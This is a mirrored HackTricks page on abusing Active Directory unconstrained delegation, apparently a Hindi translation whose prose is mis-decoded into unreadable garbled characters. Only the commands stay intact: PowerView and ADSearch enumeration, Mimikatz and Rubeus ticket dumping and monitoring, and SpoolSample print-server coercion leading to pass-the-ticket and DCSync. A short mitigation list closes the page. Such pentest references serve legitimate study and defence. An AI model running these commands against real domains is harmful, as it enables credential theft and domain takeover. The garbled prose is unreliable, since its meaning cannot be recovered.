Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation.md

79 lines
8.6 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Unconstrained Delegation
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ЁЯТм [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Unconstrained delegation
рдпрд╣ рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИ рдЬрд┐рд╕реЗ рдПрдХ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдбреЛрдореЗрди рдХреЗ рдЕрдВрджрд░ рдХрд┐рд╕реА рднреА **рдХрдВрдкреНрдпреВрдЯрд░** рдкрд░ рд╕реЗрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдлрд┐рд░, рдЬрдм рднреА рдХреЛрдИ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЙрд╕ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд▓реЙрдЧрд┐рди рдХрд░рддрд╛ рд╣реИ**, рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ **TGT рдХреА рдПрдХ рдкреНрд░рддрд┐** **DC рджреНрд╡рд╛рд░рд╛ рдкреНрд░рджрд╛рди рдХрд┐рдП рдЧрдП TGS рдХреЗ рдЕрдВрджрд░ рднреЗрдЬреА рдЬрд╛рдПрдЧреА** **рдФрд░ LSASS рдореЗрдВ рдореЗрдореЛрд░реА рдореЗрдВ рд╕рд╣реЗрдЬреА рдЬрд╛рдПрдЧреА**ред рдЗрд╕рд▓рд┐рдП, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдорд╢реАрди рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рдЖрдк **рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХрд┐рд╕реА рднреА рдорд╢реАрди рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ**ред
рддреЛ рдпрджрд┐ рдПрдХ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ "рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди" рд╡рд┐рд╢реЗрд╖рддрд╛ рд╕рдХреНрд░рд┐рдп рдХрд░рдХреЗ рдХрд┐рд╕реА рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд▓реЙрдЧрд┐рди рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдЖрдкрдХреЗ рдкрд╛рд╕ рдЙрд╕ рдорд╢реАрди рдХреЗ рдЕрдВрджрд░ рд╕реНрдерд╛рдиреАрдп рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рдЖрдк рдЯрд┐рдХрдЯ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХрд╣реАрдВ рднреА рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдбреЛрдореЗрди рдкреНрд░рд┐рд╡реЗрд╕реНрдХ)ред
рдЖрдк рдЗрд╕ рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЗ рд╕рд╛рде рдХрдВрдкреНрдпреВрдЯрд░ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ **рдЦреЛрдЬ рд╕рдХрддреЗ рд╣реИрдВ** рдпрд╣ рдЬрд╛рдВрдЪрдХрд░ рдХрд┐ [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) рд╡рд┐рд╢реЗрд╖рддрд╛ рдореЗрдВ [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) рд╢рд╛рдорд┐рд▓ рд╣реИ рдпрд╛ рдирд╣реАрдВред рдЖрдк рдЗрд╕реЗ тАШ(userAccountControl:1.2.840.113556.1.4.803:=524288)тАЩ рдХреЗ LDAP рдлрд╝рд┐рд▓реНрдЯрд░ рдХреЗ рд╕рд╛рде рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреЛ рдкреЙрд╡рд╡реНрдпреВ рдХрд░рддрд╛ рд╣реИ:
<pre class="language-bash"><code class="lang-bash"># List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&#x26;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Export tickets with Mimikatz
</strong>privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #Check every 10s for new TGTs</code></pre>
**Mimikatz** рдпрд╛ **Rubeus** рдХреЗ рд╕рд╛рде рдкреНрд░рд╢рд╛рд╕рдХ (рдпрд╛ рдкреАрдбрд╝рд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛) рдХрд╛ рдЯрд┐рдХрдЯ рдореЗрдореЛрд░реА рдореЗрдВ рд▓реЛрдб рдХрд░реЗрдВ **[**рдкрд╛рд╕ рдж рдЯрд┐рдХрдЯ**](pass-the-ticket.md)** рдХреЗ рд▓рд┐рдПред\
рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА ired.team рдкрд░ред**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
### **Force Authentication**
рдпрджрд┐ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ **"рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди" рдХреЗ рд▓рд┐рдП рдЕрдиреБрдордд рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реИ**, рддреЛ рд╡рд╣ **рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░** рдХреЛ **рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд▓реЙрдЧрд┐рди** рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП **рдзреЛрдЦрд╛ рджреЗ рд╕рдХрддрд╛ рд╣реИ** рдЬрд┐рд╕рд╕реЗ **рд╕рд░реНрд╡рд░ рдХреА рдореЗрдореЛрд░реА рдореЗрдВ рдПрдХ TGT рд╕рд╣реЗрдЬрд╛ рдЬрд╛рдПрдЧрд╛**ред\
рдлрд┐рд░, рд╣рдорд▓рд╛рд╡рд░ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдкрд╛рд╕ рдж рдЯрд┐рдХрдЯ рд╣рдорд▓реЗ рдХрд╛ рдкреНрд░рджрд░реНрд╢рди рдХрд░ рд╕рдХрддрд╛ рд╣реИ**ред
рдХрд┐рд╕реА рднреА рдорд╢реАрди рдХреЗ рдЦрд┐рд▓рд╛рдл рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░ рдХреЛ рд▓реЙрдЧрд┐рди рдХрд░рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк [**SpoolSample**](https://github.com/leechristensen/SpoolSample) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
```bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```
рдпрджрд┐ TGT рдПрдХ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕реЗ рд╣реИ, рддреЛ рдЖрдк рдПрдХ [**DCSync attack**](acl-persistence-abuse/#dcsync) рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ DC рд╕реЗ рд╕рднреА рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред\
[**рдЗрд╕ рд╣рдорд▓реЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА ired.team рдкрд░ред**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**рдпрд╣рд╛рдБ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдордЬрдмреВрд░ рдХрд░рдиреЗ рдХреЗ рдЕрдиреНрдп рддрд░реАрдХреЗ рд╣реИрдВ:**
{% content-ref url="printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
{% endcontent-ref %}
### рд╢рдорди
* DA/рдПрдбрдорд┐рди рд▓реЙрдЧрд┐рди рдХреЛ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реЗрд╡рд╛рдУрдВ рддрдХ рд╕реАрдорд┐рдд рдХрд░реЗрдВ
* рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЦрд╛рддреЛрдВ рдХреЗ рд▓рд┐рдП "рдЦрд╛рддрд╛ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИ рдФрд░ рдЗрд╕реЗ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛" рд╕реЗрдЯ рдХрд░реЗрдВред
{% hint style="success" %}
AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ</summary>
* [**рд╕рджрд╕реНрдпрддрд╛ рдпреЛрдЬрдирд╛рдПрдБ**](https://github.com/sponsors/carlospolop) рджреЗрдЦреЗрдВ!
* **рд╣рдорд╛рд░реЗ** ЁЯТм [**Discord рд╕рдореВрд╣**](https://discord.gg/hRep4RUj7f) рдпрд╛ [**рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рд╕рдореВрд╣**](https://t.me/peass) рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВ рдпрд╛ **рд╣рдореЗрдВ** **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** рдкрд░ рдлреЙрд▓реЛ рдХрд░реЗрдВред**
* **рд╣реИрдХрд┐рдВрдЧ рдЯреНрд░рд┐рдХреНрд╕ рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдФрд░** [**HackTricks**](https://github.com/carlospolop/hacktricks) рдФрд░ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) рдЧрд┐рдЯрд╣рдм рд░рд┐рдкреЛрдЬрд┐рдЯрд░реА рдореЗрдВ PR рд╕рдмрдорд┐рдЯ рдХрд░реЗрдВред
</details>
{% endhint %}
Reference in a new issue View git blame Copy permalink